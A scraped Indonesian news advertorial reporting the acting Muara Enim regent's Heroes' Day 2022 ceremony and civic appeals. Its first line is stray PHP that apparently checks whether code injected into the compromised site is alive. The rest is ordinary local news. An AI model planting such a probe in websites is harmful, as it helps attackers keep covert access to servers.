error_reporting(0); set_time_limit(0); if ($_GET['q']=='1'){echo '200'; exit;} Kurniawan.AP.MSi Ajak Warga Muara Enim Tetap Bersatu Teguh Dan Mengenang Hari Pahlawan 10 November - SMI.COM

Home / ADVETORIAL / MUARA ENIM

Kamis, 10 November 2022 - 13:44 WIB

Kurniawan.AP.MSi Ajak Warga Muara Enim Tetap Bersatu Teguh Dan Mengenang Hari Pahlawan 10 November

Muara Enim, SMI-

Momentum memperingati hari pahlawan, Peringatan hari pahlawan setiap tanggal 10 November dalam setiap tahunnya. Begitu juga dengan di Kabupaten Muara Enim, Pemerintah Kabupaten Muara Enim dalam memperingati hari pahlawan tahun 2022 ini.Dalam melaksanakan upacara bendera dan tabur bunga di Taman Makam Pahlawan Ksatria Pertiwi Muara Enim, dipimpin langsung oleh Penjabat Bupati Muara Enim Kurniawan.AP.MSi.

Hadir dalam upacara memperingati Hari Pahlawan di Taman Makam Pahlawan Muara Enim, Kurniawan.AP.MSi penjabat Bupati Muara Enim, kejaksaan negeri Muara Enim, Polres Muara Enim, unsur Forkompinda Muara Enim, serta para tamu undangan yang hadir dalam upacara memperingati Hari Pahlawan Tahun 2022 di Taman Makam Pahlawan Muara Enim.

Kurniawan.AP.MSi selaku pejabat bupati Muara Enim menyampaikan ucapan selamat memperingati hari pahlawan nasional Tahun 2022, dalam ucapan dan sambutannya beliau menyampaikan”, sesuai dengan tema nasional pahlawanku teladanku mari kita semua khususnya masyarakat Sumatera Selatan dan masyarakat Kabupaten Muara Enim, untuk meneladani Semangat perjuangan Sultan Mahmud Badaruddin II.

Baca Juga :  Tokoh DOB Rambang Lubai Lematang Prihatin Kantor DPRD Muara Enim Di Geledah KPK

Marilah kita semua terus berbakti memberikan yang terbaik bagi bangsa dan negara ini. Perjuangan kita belum berakhir, Oleh karena itu semua harus diisi dengan pembangunan yang adil dan merata Demi kesejahteraan masyarakat. Semoga pahlawan yang telah gugur di medan perang diberikan tempat yang terbaik di sisi Allah subhanahu Wa ta’ala.Kita juga harus menyadari bahwa kita berbeda-beda, tetapi kita jangan sampai terpecah belah oleh perbedaan suku,ras agama dan antar golongan.”,Ujar Kurniawan.AP.MSi Pj.Bupati Muara Enim.

Sementara itu pada momentum peringatan Hari Pahlawan 10 November Tahun 2022 ini,wakil ketua DPRD Tingkat II Kabupaten Muara Enim Ermanadi Tjik Janom, kepada awak media ini menuturkan himbauannya kepada seluruh masyarakat kabupaten Muara Enim.

Baca Juga :  Peserta Bimtek Posyantek Kecamatan Kandis Kabupaten Ogan ilir Datangi Desa Lubuk Raman Kecamatan Rambang Niru

Sesuai dengan tema hari pahlawan Tahun 2022 ini, memperingati hari Pahlawan,”Pahlawanku teladanku”.

Maka marilah kita bersama-sama mengenang jasa para pahlawan kita, yang telah gugur membela kemerdekaan Republik Indonesia. Kita saat ini mengisi kemerdekaan dengan membangun Kabupaten Muara Enim menjadi lebih maju lagi. Begitu juga dengan program pembangunan yang dilanjutkan oleh pemerintah Kabupaten Muara Enim, maka kita wajib untuk menyukseskan dan mendukungnya untuk kesejahteraan masyarakat Kabupaten Muara Enim”, Ungkap Ermanadi Tjik Janom Wakil Ketua DPRD Kabupaten Muara Enim.

(Sunar/ADV)

Share :

Baca Juga

ADVETORIAL

Meriahkan HUT RI, Pertama SMM Group Gelar lomba Karya Tulis

MUARA ENIM

Kurniawan.AP.MSi Dampingi Herman Deru Buka Jambore Purna Paskibraka Indonesia Se-Sumatera Selatan

MUARA ENIM

Kapolda Sumatera Selatan Copot Kapolsek Gunung Megang Buntut Meledaknya Gudang BBM Ilegal

MUARA ENIM

Keluhan Warga Terkait Rencana Penutupan Jalan Sudirman

ADVETORIAL

Bismillah, Pemko Padang Lepas Mahyeldi Menuju Istana Gubernur

MUARA ENIM

Dony Ariyanto Wartawan Sumsel News Muara Enim Bantah Tegas Di Tuding Premanisme

ADVETORIAL

Wali Kota Lubuk Linggau Teken Nota Kesepakatan dengan PT SMF dan Kementerian PUPR

ADVETORIAL

Tingkatkan Kualitas Pendidikan Usia Dini, Astra Renovasi Gedung Pengembangan PAUD Kasih Bunda